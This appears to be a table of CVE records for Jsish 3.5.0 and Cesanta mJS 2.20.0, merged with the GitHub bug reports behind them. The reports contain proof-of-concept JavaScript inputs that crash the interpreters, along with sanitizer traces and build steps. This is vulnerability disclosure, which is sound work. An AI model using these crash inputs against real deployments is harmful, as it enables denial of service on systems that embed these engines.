0x0c047fff8340: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff8350: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff8360: fa fa fd fd fa fa fd fd fa fa 07 fa fa fa fd fd
=>0x0c047fff8370: fa fa 00 07 fa fa 00 00 fa fa 00 04 fa fa[fd]fd
0x0c047fff8380: fa fa 00 04 fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff83a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff83b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff83c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==88163==ABORTING
```
| Heap-use-after-free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732) | https://api.github.com/repos/pcmacdon/jsish/issues/88/comments | 0 | 2021-12-24T10:54:21Z | 2021-12-26T20:57:24Z | https://github.com/pcmacdon/jsish/issues/88 | 1,088,314,163 | 88 | 3,129 |
CVE-2021-46504 | 2022-01-27T21:15:09.233 | There is an Assertion 'vp != resPtr' failed at jsiEval.c in Jsish v3.5.0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/51"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/51"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/pcmacdon/jsish/issues/51 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
(function(){
var JSEtest = 1;
for (var __loopvar3 = 0; JSEtest.length < (1) && __loopvar3 < 3; JSEtest.length++ + __loopvar3++) {
JSEtest = 1;
}
})();
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
jsish: src/jsiEval.c:1020: jsiEvalSubscript: Assertion `vp != resPtr' failed.
[2] 11225 abort jsish poc.js
```
Credits: Found by hopefly from OWL337. | Assertion `vp != resPtr' failed at jsiEval.c:1020: jsiEvalSubscript. | https://api.github.com/repos/pcmacdon/jsish/issues/51/comments | 0 | 2021-12-24T09:40:19Z | 2022-01-12T02:02:10Z | https://github.com/pcmacdon/jsish/issues/51 | 1,088,275,965 | 51 | 3,130 |
CVE-2021-46505 | 2022-01-27T21:15:09.277 | Jsish v3.5.0 was discovered to contain a stack overflow via /usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/53"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/53"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"674"
] | 674 | https://github.com/pcmacdon/jsish/issues/53 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
function JSEtest(Function) {
var a = Array.prototype.push.call(a, 42, 43);
}
for (var i = 0; i < 25000; i++) {
JSEtest(Array);
}
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
ASAN:DEADLYSIGNAL
=================================================================
==9209==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd05e20e58 (pc 0x7f6abd3fb1e6 bp 0x7ffd05e216f0 sp 0x7ffd05e20e60 T0)
#0 0x7f6abd3fb1e5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5)
#1 0x5571122680fd in Jsi_NameLookup src/jsiUtils.c:413
#2 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
#3 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
#4 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
#5 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
#6 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
#7 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
#8 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
#9 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
...... ...... ......
...... ...... ......
#246 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
#247 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
#248 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
#249 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
#250 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
SUMMARY: AddressSanitizer: stack-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5)
==9209==ABORTING
```
Credits: Found by OWL337 team. | Stack-overflow in (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5) | https://api.github.com/repos/pcmacdon/jsish/issues/53/comments | 0 | 2021-12-24T09:43:02Z | 2022-01-12T02:11:35Z | https://github.com/pcmacdon/jsish/issues/53 | 1,088,277,342 | 53 | 3,131 |
CVE-2021-46506 | 2022-01-27T21:15:09.323 | There is an Assertion 'v->d.lval != v' failed at src/jsiValue.c in Jsish v3.5.0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/52"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/52"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/pcmacdon/jsish/issues/52 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
function applyTags(text, open, close, action) {
var openTags = arguments;
var lastOcr = text.indexOf(open), nextOpen, nextClose, iniBlock, updBlock;
if (openTags.pop()) {
openTags.push(lastOcr);
}
while (openTags.length > 0) {
lastOcr = action;
nextOpen = text.indexOf(open, lastOcr + open.length);
nextClose = text.indexOf(close, lastOcr + open.length);
}
return text;
}
function JSEtest(text) {
return text.toUpperCase();
}
var text = '<lowcase> YEAH! </lowcase> Some <upcase> random <upcase> text </upcase> to </up$
text = applyTags(text, '<upcase>', '</upcase>', JSEtest);
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
/home/user/poc.js:9: bug: Convert a unknown type: 0x6 to number (at or near "length")
/home/user/poc.js:10: bug: Convert a unknown type: 0x6 to number (at or near "length")
jsish: src/jsiValue.c:181: ValueFree: Assertion `v->d.lval != v' failed.
[2] 116137 abort jsish poc.js
```
Credits: Found by OWL337 team. | Assertion `v->d.lval != v' failed at src/jsiValue.c:181: ValueFree. | https://api.github.com/repos/pcmacdon/jsish/issues/52/comments | 0 | 2021-12-24T09:41:38Z | 2022-01-12T02:03:28Z | https://github.com/pcmacdon/jsish/issues/52 | 1,088,276,639 | 52 | 3,132 |
CVE-2021-46507 | 2022-01-27T21:15:09.367 | Jsish v3.5.0 was discovered to contain a stack overflow via Jsi_LogMsg at src/jsiUtils.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/54"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/54"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"674"
] | 674 | https://github.com/pcmacdon/jsish/issues/54 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case1
```javascript
WebSocket({
"a": 2.3023e-320
})
```
###### Test case2
```javascript
var JSEtest = times(function () {
WebSocket({
'red': (new Object(null % null))
});
}) < times(log(null % null));
assert.sameValue(JSEtest.length, 2, 'newArr.length');
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
ASAN:DEADLYSIGNAL
=================================================================
ERROR: AddressSanitizer: stack-overflow on address 0x7ffe51210dfc (pc 0x55d8eb693014 bp 0x0fffca2427b6 sp 0x7ffe51210df0 T0)
#0 0x55d8eb693013 in Jsi_LogMsg src/jsiUtils.c:151
#1 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
#2 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
#3 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
#4 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
#5 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
#6 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
...... ...... ......
...... ...... ......
#246 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
#247 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
#248 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
#249 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
#250 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
SUMMARY: AddressSanitizer: stack-overflow src/jsiUtils.c:151 in Jsi_LogMsg
====ABORTING
```
Credits: Found by OWL337 team. | Stack-overflow src/jsiUtils.c:151 in Jsi_LogMsg | https://api.github.com/repos/pcmacdon/jsish/issues/54/comments | 0 | 2021-12-24T09:43:48Z | 2022-01-12T02:11:46Z | https://github.com/pcmacdon/jsish/issues/54 | 1,088,277,734 | 54 | 3,133 |
CVE-2021-46508 | 2022-01-27T21:15:09.413 | There is an Assertion `i < parts_cnt' failed at src/mjs_bcode.c in Cesanta MJS v2.20.0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/188"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/188"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/cesanta/mjs/issues/188 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
vim Makefile
DOCKER_CLANG=clang
$(DOCKER_CLANG) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
(JSON.stringify([1, 2, 3]))((isNaN - 6.54321e2)(JSON.stringify([1, 2, 3])));
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
mjs: src/mjs_bcode.c:121: struct mjs_bcode_part *mjs_bcode_part_get_by_offset(struct mjs *, size_t): Assertion `i < parts_cnt' failed.
[1] 88797 abort mjs poc.js
```
Credits: Found by OWL337 team. | Assertion `i < parts_cnt' failed at src/mjs_bcode.c:121: struct mjs_bcode_part *mjs_bcode_part_get_by_offset(struct mjs *, size_t). | https://api.github.com/repos/cesanta/mjs/issues/188/comments | 0 | 2021-12-31T05:23:32Z | 2022-01-12T02:18:33Z | https://github.com/cesanta/mjs/issues/188 | 1,091,424,362 | 188 | 3,134 |
CVE-2021-46509 | 2022-01-27T21:15:09.460 | Cesanta MJS v2.20.0 was discovered to contain a stack overflow via snquote at mjs/src/mjs_json.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/200"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/200"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"674"
] | 674 | https://github.com/cesanta/mjs/issues/200 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build steps
```bash
vim Makefile
DOCKER_CLANG=clang
$(DOCKER_CLANG) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
(JSON.stringify([1, 2, 3]))((JSON.parse - 6.5 - 321e2)(JSON.stringify([1, 2, 3])));
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==61262==ERROR: AddressSanitizer: stack-overflow on address 0x7ffc3387c0b8 (pc 0x00000057a83c bp 0x7ffc338787d0 sp 0x7ffc33878338 T0)
#0 0x57a83b in snquote /root/mjs/src/mjs_json.c:102:7
#1 0x57a83b in to_json_or_debug /root/mjs/src/mjs_json.c:167
#2 0x55178f in mjs_exec_internal /root/mjs/src/mjs_exec.c:1073:5
#3 0x552d2d in mjs_exec_file /root/mjs/src/mjs_exec.c:1096:11
#4 0x5821d3 in main /root/mjs/src/mjs_main.c:47:11
#5 0x7f82916bcb96 in __libc_start_main /build/glibc-2ORdQG/glibc-2.27/csu/../csu/libc-start.c:310
#6 0x41a2c9 in _start (/usr/local/bin/mjs+0x41a2c9)
SUMMARY: AddressSanitizer: stack-overflow /root/mjs/src/mjs_json.c:102:7 in snquote
==61262==ABORTING
```
Credits: Found by OWL337 team.
| Stack-overflow mjs/src/mjs_json.c:102:7 in snquote | https://api.github.com/repos/cesanta/mjs/issues/200/comments | 0 | 2021-12-31T05:43:04Z | 2022-01-12T02:20:01Z | https://github.com/cesanta/mjs/issues/200 | 1,091,428,300 | 200 | 3,135 |
CVE-2021-46510 | 2022-01-27T21:15:09.507 | There is an Assertion `s < mjs->owned_strings.buf + mjs->owned_strings.len' failed at src/mjs_gc.c in Cesanta MJS v2.20.0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/185"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/185"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/cesanta/mjs/issues/185 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
vim Makefile
DOCKER_GCC=gcc
DOCKER_CLANG=clang
$(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
(function () {
((function f(a) {
if (a > 0) {
if (gc(JSON.stringify({
translate: ({
enumerable: [
!Object.create
]
})
})) !== f("switch(''){default:break;/*DUPTRY525*/}")('#1.1: -0 - -0 === 0. Actual: ' !== f(a - 1))) {
f(a - 1)
}
}
})(6))
})()
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
mjs: src/mjs_gc.c:354: gc_mark_string: Assertion `s < mjs->owned_strings.buf + mjs->owned_strings.len' failed.
[1] 68013 abort mjs poc.js
```
Credits: Found by OWL337 team. | Assertion `s < mjs->owned_strings.buf + mjs->owned_strings.len' failed src/mjs_gc.c:354: gc_mark_string. | https://api.github.com/repos/cesanta/mjs/issues/185/comments | 0 | 2021-12-31T05:20:39Z | 2022-01-12T02:18:09Z | https://github.com/cesanta/mjs/issues/185 | 1,091,423,652 | 185 | 3,136 |
